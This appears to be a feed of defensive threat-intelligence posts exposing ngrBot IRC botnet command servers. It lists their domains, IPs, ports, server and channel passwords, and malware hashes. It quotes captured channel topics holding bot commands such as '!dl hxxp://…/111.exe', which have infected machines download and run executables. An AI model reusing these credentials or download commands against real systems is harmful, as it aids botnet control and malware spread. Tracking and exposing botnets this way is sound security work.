Thanks to anonymous guy here for finding this botnet. Resolved : [dd.sult4n.net] To [67.202.92.70] Resolved : [www.8rb.su] To [67.202.92.70] Other domains: xx.sult4n.net, x.sult4n.net Thnx to Userbased for this and for server and channel pass Server : dd.sult4n.net:4040 PASS sulxx Channel : #m PASS sul111 Now talking in #m Topic On: [ #m ] [ !mod usbiRead more...
178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)
Botnet found by rolls Server: 178.86.23.225:1875 Server Password: Username: uiswnri Nickname: n{DE|XPa}uiswnri Channel: #moon (Password: 4m3r1k) Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0 Inactive domain :harlan10.com hosting infos: http://whois.domaintools.com/178.86.23.225
t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)
Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187 Server: t.baerr01.com Port: 6512 Server password: smart Channel: #dpi :hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe Channel: #tar Channel password: smart A modified ircd is used, making it difficult to connect using a regular irc client. Related md5s (search onRead more...
x.e1b2.org (ngrBot irc botnet hosted by namecheap.com)
Resolved x.e1b2.org to 192.64.114.16, 192.64.114.184 Server: x.e1b2.org Port: 80 Server password: 666666 Channel: ##Rox-x01## Topic for ##Rox-x01## is: !m on !s -n !mod usbi on !NAZEL hxxp://www8.0zz0.com/2013/05/25/23/865519528.gif !NAZEL hxxp://www12.0zz0.com/2013/05/24/15/675195622.gif !NAZEL hxxp://www12.0zz0.com/2013/05/21/06/487587018.gif Topic for ##Rox-x01## set by xXx at Mon May 27 14:47:02 2013 The server requires SSL to connect Alternate domains: x.e2b3.org x.c1d2.org x.x1ua.org x.x1x2.suRead more...
e.balkrev.com(ngrBot hosted in China Changsha Chinanet Hunan Province Network)
Resolved : [e.balkrev.com] To [124.232.150.214] Resolved : [e.balkrev.com] To [60.172.229.40] Resolved : [e.balkrev.com] To [124.232.163.154] Resolved : [e.balkrev.com] To [124.232.163.150] Resolved : [e.balkrev.com] To [124.232.163.119] TCP Traffic: e.balkrev.com:6510 PASS smart Data received: :Fax!Max@hub.us.com ppppmsg n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi [US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss n[US{XPa{jikgbsd @ #mss so channelsRead more...
f.eastmoon.pl(ngrBot hosted in Germany Karlsruhe 1&1 Internet Ag)
Resolved : [f.eastmoon.pl] To [217.160.173.154]Resolved : [f.eastmoon.pl] To [74.208.230.53] Resolved : [f.eastmoon.pl] To [188.138.89.106]Resolved : [f.eastmoon.pl] To [85.25.86.198]Resolved : [f.eastmoon.pl] To [213.165.71.238] Server: 213.165.71.238:9000Server Password:Username: cemomcbNickname: n{DEU-XPx86a}rxibehmdChannel: #sp (Password: yap)Channeltopic: :!wBHv0JQ4frCCAfQ1ausiPUf+8V+7lwXPGIyAUdmor0CO5CSlmlrNT0sLhs1byIa5Qf+YnMhtBmCBtEOb6hI= Server: 188.138.89.106:9000Server Password:Username: pqellooNickname: {DEU-XPx86a}pqelloovChannel: #sp (Password: yap)Channeltopic: :!wBHv0JQ4frCCAfQ1ausiPUf+8V+7lwXPGIyAUdmor0CO5CSlmlrNT0sLhs1byIa5Qf+YnMhtBmCBtEOb6hI= Samples: hxxp://hotfile.com/dl/206650590/b80e8ea/spieoaiuasf.html hxxp://199.7.177.236/dl/206565430/6f9ee70/we71fw1fe6320.html Thanx to aLiSs for samples and for finding this net hosting infos:Read more...
m.jamtes.com (ngrbot irc botnet hosted by China Hefei Chinanet Anhui Province Network)
Resolved m.jamtes.com to 60.172.228.177 Server: m.jamtes.com Port: 7384 Server password: smart Channel: #spd Channel password: smart Channel topic #spd: !mod pdef on !mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe !dl hxxp://146.185.246.104/dqs.exe !s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe Channel topic #1: !dl hxxp://146.185.246.116/mailsw7.exe !dl hxxp://146.185.246.116/lmqw7.exe !dl hxxp://146.185.246.116/five192w7.exe !dl hxxp://146.185.246.116/five172w7.exe Channel topic #2: !dl hxxp://146.185.246.116/tefw7.exe !dl hxxp://146.185.246.116/p98w7.exe !dl hxxp://146.185.246.116/p18w7.exeRead more...
xixbh.net (ngrbot irc botnet hosted by oneandone.net)
Resolved xixbh.net to 212.227.83.111, 213.165.68.138, 85.25.86.198 Server: xixbh.net (alternate domains: xixbh.com gigasbh.org) Port: 1863 Server password: jobs Channel: #jobs Topic for #jobs is: !dl hxxp://hotfile.com/dl/200451226/2ff4c3f/orf4Duu.html Topic for #jobs set by x at Fri Mar 29 13:40:52 2013 SSL is required to connect to this server This is the same guy as these previous posts.
altincopps.com(ngrBot hosted in United States Network Operations Center Inc.)
Server: 64.120.135.140:1434 Username: mmgamzu Nickname: n{DE|XPa}mmgamzu Channel: #mrag (Password: ngrBot) hosting infos: http://whois.domaintools.com/64.120.135.140
f0001.info/f0010.info/thismynew1.info(ngrBot hosted by Czech Republic Zlin Fdcservers.net)
Resolved : [f0001.info] To [50.7.193.194] Resolved : [f0010.info] To [50.7.193.194] Resolved : [thismynew1.info] To [50.7.193.194] mom002.net not active now Server: 50.7.193.194:1887 Server Password: Username: jhdkutg Nickname: n{DE|XPa}jhdkutg Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s Download URLs hxxp://69.197.137.58/ (api.wipmania.com) hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com) hxxp://74.120.9.239/get/dd7d65c3bbc12e445706a49c446988ac892a41d5/512e2c88/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com) hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com) hxxp://74.120.9.239/get/a1c05bb55ad6d37d36fec2886739a08919e1fd13/512e2cb6/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com) hosting infos:http://whois.domaintools.com/50.7.193.194